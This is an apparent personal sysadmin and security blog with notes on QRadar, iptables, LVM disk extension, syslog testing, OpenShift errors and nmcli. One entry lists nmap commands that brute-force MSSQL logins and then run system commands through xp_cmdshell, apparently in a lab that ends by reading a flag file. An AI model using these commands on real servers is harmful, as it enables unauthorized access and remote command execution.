tcpdump -nns0 -i any -c 100000 dst port 514 |awk '{print $3}' |cut -d. -f1-4 |sort -V |uniq -c |sort -n
Wednesday, August 17, 2022
Tuesday, August 9, 2022
QRadar: snmpwalk: Failure in sendto (Operation not permitted)
[root@console snmp]# snmpwalk -Os -c public -v 2c 127.0.0.1:8001 iso.3.6.1.2.1.1.1
snmpwalk: Failure in sendto (Operation not permitted)
I solved it by changing port number to 8002 and with additional iptables rules.
# Default iptables rules block 8001 traffic.
[root@console ~]# grep -HR 8001 /etc/* 2>/dev/null |grep REJECT
/etc/sysconfig/iptables:-A INPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A INPUT -p udp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p udp --dport 8001 -j REJECT
# solution
[root@console ~]# iptables -I INPUT -p udp -m udp --dport 8002 -j ACCEPT
[root@console ~]# iptables -I OUTPUT -p udp -m udp --sport 8001 -j ACCEPT
[root@console ~]# iptables-save
snmpwalk: Failure in sendto (Operation not permitted)
I solved it by changing port number to 8002 and with additional iptables rules.
# Default iptables rules block 8001 traffic.
[root@console ~]# grep -HR 8001 /etc/* 2>/dev/null |grep REJECT
/etc/sysconfig/iptables:-A INPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A INPUT -p udp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p udp --dport 8001 -j REJECT
# solution
[root@console ~]# iptables -I INPUT -p udp -m udp --dport 8002 -j ACCEPT
[root@console ~]# iptables -I OUTPUT -p udp -m udp --sport 8001 -j ACCEPT
[root@console ~]# iptables-save
QRadar: extract test steps of a specific offense rule
/opt/qradar/support/extractRules.py -o QRadarRules.tsv
# psql -t -A -U qradar -c "SELECT rule_data FROM custom_rule WHERE id=100311" | xmllint --xpath "//rule/testDefinitions/test/text" - | perl -MHTML::Entities -pe 'decode_entities($_);' |sed -e 's/<[^>]*>//g'
QRadar: Ariel query for getting related usernames in an offense
AQL query:
SELECT username FROM events WHERE INOFFENSE(ID) GROUP BY username
QRadar: Ariel query for getting related remote IPs in an offense
AQL query for getting remote ip addresses which is related with specific offense:
select distinct destinationip from events where INOFFENSE(633) TIMES OFFENSE_TIME(633) AND eventdirection IN ('L2R', 'R2R')
Tuesday, August 2, 2022
nmap scripts for mssql servers
nmap -p 1433 10.0.30.0/24
nmap --script ms-sql-info -p 1433 10.0.30.33
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 10.0.30.33
nmap -p 1433 --script ms-sql-empty-password 10.0.30.33
nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" 10.0.30.33 -oN output.txt
gvim output.txt
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ipconfig" 10.0.30.33
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" 10.0.30.33
QRadar SOAR: How to increase partition size by using a new disk on RHEL with LVM
Steps:
Steps to add a new hard disk to LVM on IBM Security SOAR appliance running Red Hat Linux with LVM support:
1. In vSphere client, add a new hard disk at Virtual Device Node SCSI (0: 1).
2. SSH to the server.
3. Get the host bus number:
sudo grep mpt /sys/class/scsi_host/host?/proc_name
The response is similar to
/sys/class/scsi_host/host2/proc_name:mptspi
4. Rescan for new disks on host bus 2:
echo "- - -" > sudo /sys/class/scsi_host/host2/scan
5. Make sure new disk /dev/sdb is added to the system:
sudo fdisk -l
6. Create a new partition on /dev/sdb with file system type 8e (Linux LVM):
sudo fdisk /dev/sdb
=======
Command (m for help): n
Select (default p): p
Partition number (1-4, default 1): 1
First sector (a-b, default a): [Enter to use the default value]
Last sector, +sectors or +size{K,M,G} (a-b, default b): [Enter to use the default value]
Command (m for help): t
Hex code (type L to list all codes): 8e
Command (m for help): p
Command (m for help): w
=======
7. Create a physical volume for LVM:
sudo pvcreate /dev/sdb1
8. Get the volume group name (VG Name):
sudo vgdisplay
9. Extend the 'resilient' volume group by adding in the physical volume of /dev/sdb1:
sudo vgextend resilient /dev/sdb1
10. Scan all disks for physical volumes:
sudo pvscan
11. Check the volume group name (VG Name) again to make sure free space is added:
sudo vgdisplay
12. Display the path of the logical volume (LV Path):
sudo lvdisplay
The following assumes that you want to split the new disk over the three logical volumes.
13. Extend the logical volume for multiple logical volumes:
sudo lvresize --resizefs --extents +80%FREE /dev/resilient/root
sudo lvresize --resizefs --extents +100%FREE /dev/resilient/co3
The previous commands allocate 80% of the extended space to "/dev/resilient/root" LVM, and then allocate the rest 20% to "/dev/resilient/co3" LVM.
14. Display the disk space usage to ensure new space is added:
sudo df -h
Reference:
Thursday, July 28, 2022
Send a test syslog message to remote syslog server
logger -n <remoteip> -T -P 514 "aliokan Test message"
Sunday, June 5, 2022
Thursday, January 27, 2022
ERROR on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":
Problem:
..
DEBUG vsphere_tag_category.category: Creation complete after 0s [id=urn:vmomi:InventoryServiceCategory:f49160e4-a017-404f-9ecf-88b93e02f300:GLOBAL]
DEBUG vsphere_tag.tag: Creating...
DEBUG vsphere_tag.tag: Creation complete after 0s [id=urn:vmomi:InventoryServiceTag:75e6da39-1493-4760-a360-5708375c1e49:GLOBAL]
DEBUG vsphereprivate_import_ova.import: Creating...
ERROR
ERROR Error: failed to find provided vSphere objects: failed to find a host in the cluster that contains the provided datastore
ERROR
ERROR on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":
ERROR 44: resource "vsphereprivate_import_ova" "import" {
ERROR
ERROR
FATAL failed to fetch Cluster: failed to generate asset "Cluster": failed to create cluster: failed to apply Terraform: failed to complete the change
..
Root cause of the problem:
This issue was caused by trying to use a datastore that was not shared storage on a cluster with multiple hypervisors.
Sunday, January 23, 2022
Saturday, January 22, 2022
Bulma.io: the modern CSS framework that just works.
Bulma is a free, open source framework that provides ready-to-use frontend components that you can easily combine to build responsive web interfaces.
Themes:
https://jenil.github.io/bulmaswatch/
Friday, December 31, 2021
libera.chat: new irc environment for opensource communities
In the past I was using Freenode IRC server for getting support from open-source communities. After freenode I saw that some important communities moved this environment. I want to share details with you.
Server address:
/server irc.libera.chat 6667
You can connect with an irc client. IRC client suggestion: hexchat
Stats:
Server address:
/server irc.libera.chat 6667
You can connect with an irc client. IRC client suggestion: hexchat
Stats:
Saturday, December 11, 2021
Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package
Who is impacted?
Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable.
https://www.lunasec.io/docs/blog/log4j-zero-day/
X-Force Report URL:
netmiko: Multi-vendor network device library for python
github.com/ktbyers/netmiko Multi-vendor library to simplify CLI connections to network devices; can be helpful espacially for SOAR projects
Create bootable Windows 11 iso on Ubuntu 20.04
❯ sudo dd bs=4M if=/mnt/hgfs/Ddd/Win11_English_x64v1.iso of=/dev/sdc conv=fdatasync status=progress
Wednesday, October 13, 2021
Friday, October 8, 2021
Red Hat: nmcli kullanım notları
Aşağıdaki testler Red Hat Enterprise Linux 8.2 üzerinde gerçekleştirilmiştir.
nmcli linux sistemler üzerinde NetworkManager servisi üzerinden ağ ayarlarını komut satırı kullanarak kontrol edebileceğiniz kullanabileceğiniz bir araçtır.
Aktif profili görüntüle:
#nmcli con show
Yeni bir profil tanımla:
Profil tanımlarken kullanabileceğiniz parametrelerden bazıları: con-name,ifname,type,ipv4.address,ipv4.gateway
#nmcli con add con-name lab ifname eth0 type ethernet ipv4.method manual ipv4.address 172.25.250.11/24 ipv4.gateway
Profil güncelle:
Profil güncellerken kullanabileceğiniz parametrelerden bazıları:
connection.autoconnect,ipv4.dns,+ipv4.addresses
#nmcli con mod lab ipv4.dns 4.2.2.4
#nmcli con mod lab connection.autoconnect
#nmcli con mod lab +ipv4.addresses 10.1.1.1/24
Subscribe to:
Posts (Atom)